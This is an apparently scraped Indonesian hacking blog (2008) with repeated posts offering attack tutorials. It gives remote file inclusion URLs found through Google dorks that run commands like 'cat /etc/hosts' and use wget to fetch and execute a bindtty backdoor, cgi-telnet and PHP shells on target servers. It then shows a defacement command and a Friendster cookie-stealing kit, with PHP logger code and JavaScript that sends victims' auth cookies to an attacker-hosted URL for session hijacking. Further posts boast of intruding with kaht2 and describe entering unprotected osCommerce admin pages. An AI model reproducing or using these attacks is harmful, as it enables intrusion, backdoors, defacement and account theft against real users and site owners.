kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “
3.eksekusi file httpd tadi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “
3. akses cgitelnet kita dengan membuka url :
” http://www.target.com/cgi-bin/test.pl “
masukkan passwordnya “n0fr13″
III. install shell php
1. buat url seperti ini :
“http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
” http://www.target.com/target/log.php “
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
Filed Under (All, Hacking, tips & trick) by Ph4][)HL1 R4Ph1Q1 on 24-04-2008
Tagged Under : All, Allinurl, Apa Saja, Bisa, Bugs, Cmd, Dg, Dsb, Friendship, google, Hacking, Homework, Injex, Joke, Juga, Kindness, Maka, Motivation, Nya, Spirit, Target Index, Thx, Tip & Trick
Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again :)
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “
3.eksekusi file httpd tadi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “
3. akses cgitelnet kita dengan membuka url :
” http://www.target.com/cgi-bin/test.pl “
masukkan passwordnya “n0fr13″
III. install shell php
1. buat url seperti ini :
“http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
” http://www.target.com/target/log.php “
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
Mencuri Cookies di Friendster
Mencuri Cookies di Friendster
Filed Under (All, Hacking) by Ph4][)HL1 R4Ph1Q1 on 04-05-2008
Tagged Under : Ajah, Akan, All, Cookie Yahoo, Curi, Fgets, Fopen, Friendster, google, Hacking, Kalau, Komputer, Maka, Mulai, Php Cookie, Remote Addr, Saya, Selama, Sini, Tanda, Tip & Trick, Topik, Tutorial, Yg
Cookies jelaslah sangat krusial. Apalagi di situs Friendster. Buat yg gak tau cookie, lebih baik cari info di abang Google, atau tante Yahoo, atau juga di embah Crankle, om AstaVista, dll.
Begini saja singkatnya. Cookie adalah suatu penanda yang diberikan suatu web server ke komputer kita sebagai tanda bahwa kita pernah mengunjungi situs yang bersangkutan. Nah, di beberapa situs semacam Friendster, kita akan diberikan sebuah Cookie khusus jika kita Log In ke situsnya. Nah, selama kita belum Log Out atau cookie tersebut dihapus, maka komputer tersebut akan selalu menampilkan halaman member yang bersangkutan jika membuka situs Friendster. Lalu, bagaimana jika Cookie tersebut kita curi dari member yang sedang log in?
Inilah topik yang cukup menarik. Setelah beberapa hari yang lalu saya membahas tentang Hack Friendster, saya kembali mengulasnya. Kenapa disini saya membahas mencuri Cookie di Friendster, bukan Cookie Yahoo? Ada beberapa alasan :
1. Friendster adalah situs yang cukup populer (ugh.. retoris)
2. Cookies-nya Friendster kadaluarsanya bertahun-tahun
Nah, alasan keuda-lah yang sebenarnya sangat krusial. Kalau Yahoo!, Cookies-nya punya kadaluarsa 24 Jam. Kalau Friendster, kalau gak salah kadaluarsanya bisa sampai 2015 lebih.
Oke, mulai saja tutorialnya dari mas Sepri.
Syarat yang Di Perlukan:
1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!
Kalo Belom Punya Klik Di SINI
2.Webhosting Untuk Penyimpanan Cookies Dan Code!!
Example:
http://www.ripway.com/ atau http://www.ifastnet.com Dan LAin2!!
3.Punya Account FriendSter Tentunya!!
Langkah-Langkahnya adalah:
1.Buat File PHP dengan nama c.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama c.php). Isinya :
$cookie = $_GET[’c'];
$id = $_GET[’ses’];
$ip = getenv (’REMOTE_ADDR’);
if(strstr($cookie, “mac”)){
$fl = fopen(’lastkukis.txt’, ‘r’);
$buftxt = fgets($fl);
fclose($fl);
if($cookie!=$buftxt)
{
$date=date(”dmy.g:ia”);
$fl = fopen(’logkukis.txt’, ‘a’);
fwrite($fl, “\n”.$ip.’;;’.$id.’;;’.$date.”\n”.$cookie.”\n”);
fclose($fl);
$fl = fopen(’lastkukis.txt’, ‘w’);
fwrite($fl, $cookie);
fclose($fl);
}
}
echo “history.back(-1)”;
?>
2.Buat File Dengan Nama super.js Yang Isinya:
if (pageViewerID!=””){
var c=fgetCookie(”friendster_auth”);
if (c!=””)setTimeout(”window.location.href=’http://URLWEBHOSTING/c.php?c=’+escape(c)+’&ses=’+escape(pageViewerFName)+’~’+pageViewerID+’~@’+pageOwnerID”, 8000);}
JANGAN LUPA GANTI YANG BERCETAK TEBAL DENGAN URL WEB ANDA YANG ADA FILE PHP-NYA YANG SUDAH DI-UPLOAD
3.Dan Langkah Terakhir adalah Letakkan
Code INI:
<1–
5cr1pt>
ATAU
Nah….Klo Udah Dapet!!
Kamu Buka Link Ini:
ENCODER
Nah Setelah Itu Buka Cookie Editor Di Mozilla Dengan Cara:
Tools >>> Cookie Editor>>> ADD!!
ISI Dari Kolom Kosong Tersebut:
Name : friendster_auth
Content : hasil Encoder
Host : www.friendster.com
Path : /
EXPIRES: NEW EXPIRATION DATE
TAMBAHKAN NILAI TAHUN SAJA Dari 2007 Menjadi 2009 Atau 2015
Setelah Itu SAVE Dan Refresh friendSter-Nya
Semoga bermanfaat, teknik ini juga bisa diimplementasikan pada Media Box…..
Filed Under (All, Hacking) by Ph4][)HL1 R4Ph1Q1 on 04-05-2008
Tagged Under : Ajah, Akan, All, Cookie Yahoo, Curi, Fgets, Fopen, Friendster, google, Hacking, Kalau, Komputer, Maka, Mulai, Php Cookie, Remote Addr, Saya, Selama, Sini, Tanda, Tip & Trick, Topik, Tutorial, Yg
Cookies jelaslah sangat krusial. Apalagi di situs Friendster. Buat yg gak tau cookie, lebih baik cari info di abang Google, atau tante Yahoo, atau juga di embah Crankle, om AstaVista, dll.
Begini saja singkatnya. Cookie adalah suatu penanda yang diberikan suatu web server ke komputer kita sebagai tanda bahwa kita pernah mengunjungi situs yang bersangkutan. Nah, di beberapa situs semacam Friendster, kita akan diberikan sebuah Cookie khusus jika kita Log In ke situsnya. Nah, selama kita belum Log Out atau cookie tersebut dihapus, maka komputer tersebut akan selalu menampilkan halaman member yang bersangkutan jika membuka situs Friendster. Lalu, bagaimana jika Cookie tersebut kita curi dari member yang sedang log in?
Inilah topik yang cukup menarik. Setelah beberapa hari yang lalu saya membahas tentang Hack Friendster, saya kembali mengulasnya. Kenapa disini saya membahas mencuri Cookie di Friendster, bukan Cookie Yahoo? Ada beberapa alasan :
1. Friendster adalah situs yang cukup populer (ugh.. retoris)
2. Cookies-nya Friendster kadaluarsanya bertahun-tahun
Nah, alasan keuda-lah yang sebenarnya sangat krusial. Kalau Yahoo!, Cookies-nya punya kadaluarsa 24 Jam. Kalau Friendster, kalau gak salah kadaluarsanya bisa sampai 2015 lebih.
Oke, mulai saja tutorialnya dari mas Sepri.
Syarat yang Di Perlukan:
1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!
Kalo Belom Punya Klik Di SINI
2.Webhosting Untuk Penyimpanan Cookies Dan Code!!
Example:
http://www.ripway.com/ atau http://www.ifastnet.com Dan LAin2!!
3.Punya Account FriendSter Tentunya!!
Langkah-Langkahnya adalah:
1.Buat File PHP dengan nama c.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama c.php). Isinya :
$cookie = $_GET[’c'];
$id = $_GET[’ses’];
$ip = getenv (’REMOTE_ADDR’);
if(strstr($cookie, “mac”)){
$fl = fopen(’lastkukis.txt’, ‘r’);
$buftxt = fgets($fl);
fclose($fl);
if($cookie!=$buftxt)
{
$date=date(”dmy.g:ia”);
$fl = fopen(’logkukis.txt’, ‘a’);
fwrite($fl, “\n”.$ip.’;;’.$id.’;;’.$date.”\n”.$cookie.”\n”);
fclose($fl);
$fl = fopen(’lastkukis.txt’, ‘w’);
fwrite($fl, $cookie);
fclose($fl);
}
}
echo “history.back(-1)”;
?>
2.Buat File Dengan Nama super.js Yang Isinya:
if (pageViewerID!=””){
var c=fgetCookie(”friendster_auth”);
if (c!=””)setTimeout(”window.location.href=’http://URLWEBHOSTING/c.php?c=’+escape(c)+’&ses=’+escape(pageViewerFName)+’~’+pageViewerID+’~@’+pageOwnerID”, 8000);}
JANGAN LUPA GANTI YANG BERCETAK TEBAL DENGAN URL WEB ANDA YANG ADA FILE PHP-NYA YANG SUDAH DI-UPLOAD
3.Dan Langkah Terakhir adalah Letakkan
Code INI:
<1–
5cr1pt>
ATAU
Nah….Klo Udah Dapet!!
Kamu Buka Link Ini:
ENCODER
Nah Setelah Itu Buka Cookie Editor Di Mozilla Dengan Cara:
Tools >>> Cookie Editor>>> ADD!!
ISI Dari Kolom Kosong Tersebut:
Name : friendster_auth
Content : hasil Encoder
Host : www.friendster.com
Path : /
EXPIRES: NEW EXPIRATION DATE
TAMBAHKAN NILAI TAHUN SAJA Dari 2007 Menjadi 2009 Atau 2015
Setelah Itu SAVE Dan Refresh friendSter-Nya
Semoga bermanfaat, teknik ini juga bisa diimplementasikan pada Media Box…..
MENDETEKSI PENYUSUP JARINGAN LEWAT DOS
MENDETEKSI PENYUSUP JARINGAN LEWAT DOS
Filed Under (All, Hacking, How To, Turorial) by Ph4][)HL1 R4Ph1Q1 on 28-04-2008
Tagged Under : Address State, All, Buka, Default Interval, Default Statistics, Dos Command, Ethernet Statistics, Hacking, Hanya Dengan, Interval Seconds, Iseng, Jaringan, Maka, Network Connections, Port Numbers, Protocol Statistics, Protokol, Routing Table, Sadar, Tcp Ip Network, Tcp Udp, Tip & Trick, Tutorial, Win 2000
PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada yang sedang memantau kita baik itu adminnya atau memang orang iseng yang mau mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat atau mendeteksinya hanya dengan dos command !
Ternyata di Dos ada fasilitas yang mungkin kita semua lupakan dan jarang digunakan perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu muncul deh command prompt
C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p protokol] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p protokol Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics.
By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default. interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.
Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a
C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*
sebelah nama pc itu adalah port yang digunakan untuk hubungan . netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp . Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.
C:\WINDOWS\System32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <——1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <——2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
ME UNIQUE Registered
ME UNIQUE Registered
WORKGROUP GROUP Registered
WORKGROUP GROUP Registered
ME UNIQUE Registered
INet~Services GROUP Registered
IS~ME………. UNIQUE Registered
MAC Address = 00-60-08-29-37-48
Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup. Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang hanya ada pada win 2000/xp atau nt .
C:\winnt>net send [ip/nama pc] [pesan]
Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng
jadi tambah ngerti dan asyik bukan main-main di DOS command ,apalagi kalau main di warnet :d , ya udah segitu aja tricknya semoga bermanfaat .
Status State
++ ESTABLISHED berarti komputer terhubung ke Foreign .
++ LISTENING koneksi komputer dalam keadaan standby .
++ TIME_WAIT komputer sedang menunggu suatu koneksi .
++ CLOSE_WAIT
++ FIND_WAIT
Filed Under (All, Hacking, How To, Turorial) by Ph4][)HL1 R4Ph1Q1 on 28-04-2008
Tagged Under : Address State, All, Buka, Default Interval, Default Statistics, Dos Command, Ethernet Statistics, Hacking, Hanya Dengan, Interval Seconds, Iseng, Jaringan, Maka, Network Connections, Port Numbers, Protocol Statistics, Protokol, Routing Table, Sadar, Tcp Ip Network, Tcp Udp, Tip & Trick, Tutorial, Win 2000
PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada yang sedang memantau kita baik itu adminnya atau memang orang iseng yang mau mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat atau mendeteksinya hanya dengan dos command !
Ternyata di Dos ada fasilitas yang mungkin kita semua lupakan dan jarang digunakan perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu muncul deh command prompt
C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p protokol] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p protokol Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics.
By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default. interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.
Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a
C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*
sebelah nama pc itu adalah port yang digunakan untuk hubungan . netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp . Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.
C:\WINDOWS\System32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <——1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <——2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
ME UNIQUE Registered
ME UNIQUE Registered
WORKGROUP GROUP Registered
WORKGROUP GROUP Registered
ME UNIQUE Registered
INet~Services GROUP Registered
IS~ME………. UNIQUE Registered
MAC Address = 00-60-08-29-37-48
Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup. Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang hanya ada pada win 2000/xp atau nt .
C:\winnt>net send [ip/nama pc] [pesan]
Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng
jadi tambah ngerti dan asyik bukan main-main di DOS command ,apalagi kalau main di warnet :d , ya udah segitu aja tricknya semoga bermanfaat .
Status State
++ ESTABLISHED berarti komputer terhubung ke Foreign .
++ LISTENING koneksi komputer dalam keadaan standby .
++ TIME_WAIT komputer sedang menunggu suatu koneksi .
++ CLOSE_WAIT
++ FIND_WAIT
HACKING OSCOMMERCE dan PENANGANANNYA
HACKING OSCOMMERCE dan PENANGANANNYA
Filed Under (All, Hacking, tips & trick) by Ph4][)HL1 R4Ph1Q1 on 28-04-2008
Tagged Under : All, Brankas, Content Management System, Controp, Cracking, Data2, Enak, Gampang, Gini, Gitu, Goolge, Hacking, Halaman, Kalo, Kartu Kredit, keamanan, Korban, Labas, Liat, Maka, Ngeri, Password Protect Directories, Tutorial, Udah
kali ini kita akan membahas bagaimana cara meng-hacking CMS OSCOMMERCE …. nah apa itu CMS OSCOMMERCE????…kita liat dulu yang satu ini :
CMS OSCOMMERCE
CMS OSCOMMERCE adalah suatu content management system yang dibuat untuk mem-build atau membuat web page toko online secara otomatis,..nah disini OSCOMMERCE ada kelemahannya…yaitu kita tidak bisa memberi password di halaman admin. Padahal sangat riskan sekali jika halaman admin tidak dapat diberi password. Sama saja membiarkan terbuka brankas kita di bank tanpa penjagaan polisi atau pihak keamanan bank. Ngeri kan … otomatis bisa di obrak abrik website kita…mau gitu kalo website yang udah capek2 dibuat diobrak abrik?????gak mau kan …
HACKING OSCOMMERCE
nah untuk masuk ke halaman admin gampang sekali, tinggal cari di goolge siapa aja yang memakai CMS OSCOMMERCE, kemudian ketik url di bawah ini, misalnya site yang akan kita jebol adalah www.korban.com/korban, maka kita menuliskannya di URL adalah:
www.korban.com/korban/admin
